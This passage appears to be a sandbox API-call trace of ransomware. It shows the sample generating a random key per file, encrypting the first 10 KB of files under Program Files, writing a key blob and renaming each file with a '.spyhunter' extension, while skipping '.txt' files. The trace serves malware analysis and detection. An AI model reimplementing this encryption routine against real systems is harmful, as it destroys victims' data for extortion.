lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f984, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f984*=0x2800, lpOverlapped=0x0) returned 1 [0113.243] GetProcessHeap () returned 0x2c0000 [0113.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0113.243] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.243] WriteFile (in: hFile=0xcc, lpBuffer=0x57f9c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f984, lpOverlapped=0x0 | out: lpBuffer=0x57f9c4*, lpNumberOfBytesWritten=0x57f984*=0x4, lpOverlapped=0x0) returned 1 [0113.244] WriteFile (in: hFile=0xcc, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f984, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f984*=0x30, lpOverlapped=0x0) returned 1 [0113.244] CloseHandle (hObject=0xcc) returned 1 [0113.244] GetProcessHeap () returned 0x2c0000 [0113.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0113.244] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.spyhunter") returned 122 [0113.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.spyhunter" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf.spyhunter")) returned 1 [0113.245] GetProcessHeap () returned 0x2c0000 [0113.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0113.245] GetProcessHeap () returned 0x2c0000 [0113.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.245] GetProcessHeap () returned 0x2c0000 [0113.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31baa8 | out: hHeap=0x2c0000) returned 1 [0113.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9c8 | out: pbBuffer=0x57f9c8) returned 1 [0113.245] GetProcessHeap () returned 0x2c0000 [0113.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9c0*=0x30) returned 1 [0113.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe" (normalized: "c:\\program files\\windows journal\\pdialog.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.254] GetProcessHeap () returned 0x2c0000 [0113.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.254] GetProcessHeap () returned 0x2c0000 [0113.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20440 | out: hHeap=0x2c0000) returned 1 [0113.254] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9c0 | out: pbBuffer=0x57f9c0) returned 1 [0113.254] GetProcessHeap () returned 0x2c0000 [0113.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.254] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9b8*=0x30) returned 1 [0113.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll" (normalized: "c:\\program files\\windows journal\\nbmaptip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.274] GetProcessHeap () returned 0x2c0000 [0113.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.276] GetProcessHeap () returned 0x2c0000 [0113.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20390 | out: hHeap=0x2c0000) returned 1 [0113.873] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9b0 | out: pbBuffer=0x57f9b0) returned 1 [0113.873] GetProcessHeap () returned 0x2c0000 [0113.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.874] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f9a8*=0x30) returned 1 [0113.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.905] GetProcessHeap () returned 0x2c0000 [0113.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.905] GetProcessHeap () returned 0x2c0000 [0113.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccca80 | out: hHeap=0x2c0000) returned 1 [0113.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9b0 | out: pbBuffer=0x57f9b0) returned 1 [0113.906] GetProcessHeap () returned 0x2c0000 [0113.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f9a8*=0x30) returned 1 [0113.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.917] GetProcessHeap () returned 0x2c0000 [0113.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.917] GetProcessHeap () returned 0x2c0000 [0113.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e50c60 | out: hHeap=0x2c0000) returned 1 [0113.917] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9a8 | out: pbBuffer=0x57f9a8) returned 1 [0113.917] GetProcessHeap () returned 0x2c0000 [0113.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.917] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f9a0*=0x30) returned 1 [0113.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.924] GetProcessHeap () returned 0x2c0000 [0113.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.924] GetProcessHeap () returned 0x2c0000 [0113.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e50a60 | out: hHeap=0x2c0000) returned 1 [0113.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9a8 | out: pbBuffer=0x57f9a8) returned 1 [0113.924] GetProcessHeap () returned 0x2c0000 [0113.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f9a0*=0x30) returned 1 [0113.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.943] GetProcessHeap () returned 0x2c0000 [0113.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.943] GetProcessHeap () returned 0x2c0000 [0113.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccca80 | out: hHeap=0x2c0000) returned 1 [0113.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9a0 | out: pbBuffer=0x57f9a0) returned 1 [0113.943] GetProcessHeap () returned 0x2c0000 [0113.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f998*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f998*=0x30) returned 1 [0113.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.976] GetProcessHeap () returned 0x2c0000 [0113.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.976] GetProcessHeap () returned 0x2c0000 [0113.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e192d8 | out: hHeap=0x2c0000) returned 1 [0113.977] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9a0 | out: pbBuffer=0x57f9a0) returned 1 [0113.977] GetProcessHeap () returned 0x2c0000 [0113.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.977] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f998*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f998*=0x30) returned 1 [0113.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.997] GetProcessHeap () returned 0x2c0000 [0113.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.997] GetProcessHeap () returned 0x2c0000 [0113.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cccc40 | out: hHeap=0x2c0000) returned 1 [0113.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f998 | out: pbBuffer=0x57f998) returned 1 [0113.997] GetProcessHeap () returned 0x2c0000 [0113.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f990*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f990*=0x30) returned 1 [0113.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.060] GetProcessHeap () returned 0x2c0000 [0114.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.060] GetProcessHeap () returned 0x2c0000 [0114.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccc040 | out: hHeap=0x2c0000) returned 1 [0114.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f998 | out: pbBuffer=0x57f998) returned 1 [0114.060] GetProcessHeap () returned 0x2c0000 [0114.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.060] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f990*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f990*=0x30) returned 1 [0114.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.075] GetProcessHeap () returned 0x2c0000 [0114.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.075] GetProcessHeap () returned 0x2c0000 [0114.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc3a40 | out: hHeap=0x2c0000) returned 1 [0114.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f990 | out: pbBuffer=0x57f990) returned 1 [0114.075] GetProcessHeap () returned 0x2c0000 [0114.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.076] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f988*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f988*=0x30) returned 1 [0114.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.123] GetProcessHeap () returned 0x2c0000 [0114.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.123] GetProcessHeap () returned 0x2c0000 [0114.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e53260 | out: hHeap=0x2c0000) returned 1 [0114.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f990 | out: pbBuffer=0x57f990) returned 1 [0114.123] GetProcessHeap () returned 0x2c0000 [0114.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.123] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f988*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f988*=0x30) returned 1 [0114.123] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.141] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll") returned 64 [0114.141] StrStrW (lpFirst="AdobeXMP.dll", lpSrch=".txt") returned 0x0 [0114.141] GetProcessHeap () returned 0x2c0000 [0114.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.141] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f94c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f94c*=0x2800, lpOverlapped=0x0) returned 1 [0114.163] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.163] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f94c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f94c*=0x2800, lpOverlapped=0x0) returned 1 [0114.163] GetProcessHeap () returned 0x2c0000 [0114.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.163] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.163] WriteFile (in: hFile=0x120, lpBuffer=0x57f98c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f94c, lpOverlapped=0x0 | out: lpBuffer=0x57f98c*, lpNumberOfBytesWritten=0x57f94c*=0x4, lpOverlapped=0x0) returned 1 [0114.199] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f94c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f94c*=0x30, lpOverlapped=0x0) returned 1 [0114.199] CloseHandle (hObject=0x120) returned 1 [0114.199] GetProcessHeap () returned 0x2c0000 [0114.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.199] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll.spyhunter") returned 74 [0114.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll.spyhunter")) returned 1 [0114.200] GetProcessHeap () returned 0x2c0000 [0114.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.200] GetProcessHeap () returned 0x2c0000 [0114.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.200] GetProcessHeap () returned 0x2c0000 [0114.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d034b0 | out: hHeap=0x2c0000) returned 1 [0114.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f988 | out: pbBuffer=0x57f988) returned 1 [0114.201] GetProcessHeap () returned 0x2c0000 [0114.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f980*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f980*=0x30) returned 1 [0114.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.202] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll") returned 63 [0114.202] StrStrW (lpFirst="icuuc40.dll", lpSrch=".txt") returned 0x0 [0114.202] GetProcessHeap () returned 0x2c0000 [0114.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.202] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f944*=0x2800, lpOverlapped=0x0) returned 1 [0114.215] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.215] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f944, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f944*=0x2800, lpOverlapped=0x0) returned 1 [0114.215] GetProcessHeap () returned 0x2c0000 [0114.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.215] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.215] WriteFile (in: hFile=0x120, lpBuffer=0x57f984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f944, lpOverlapped=0x0 | out: lpBuffer=0x57f984*, lpNumberOfBytesWritten=0x57f944*=0x4, lpOverlapped=0x0) returned 1 [0114.246] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f944, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f944*=0x30, lpOverlapped=0x0) returned 1 [0114.246] CloseHandle (hObject=0x120) returned 1 [0114.247] GetProcessHeap () returned 0x2c0000 [0114.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.247] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll.spyhunter") returned 73 [0114.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll.spyhunter")) returned 1 [0114.275] GetProcessHeap () returned 0x2c0000 [0114.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.275] GetProcessHeap () returned 0x2c0000 [0114.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.275] GetProcessHeap () returned 0x2c0000 [0114.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0114.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f980 | out: pbBuffer=0x57f980) returned 1 [0114.277] GetProcessHeap () returned 0x2c0000 [0114.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f978*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f978*=0x30) returned 1 [0114.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.277] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf") returned 81 [0114.277] StrStrW (lpFirst="DefaultID.pdf", lpSrch=".txt") returned 0x0 [0114.277] GetProcessHeap () returned 0x2c0000 [0114.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0114.278] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f93c*=0x2800, lpOverlapped=0x0) returned 1 [0114.293] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.294] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f93c*=0x2800, lpOverlapped=0x0) returned 1 [0114.294] GetProcessHeap () returned 0x2c0000 [0114.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0114.294] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.294] WriteFile (in: hFile=0x120, lpBuffer=0x57f97c*, nNumberOfBytesToWrite=0x4, 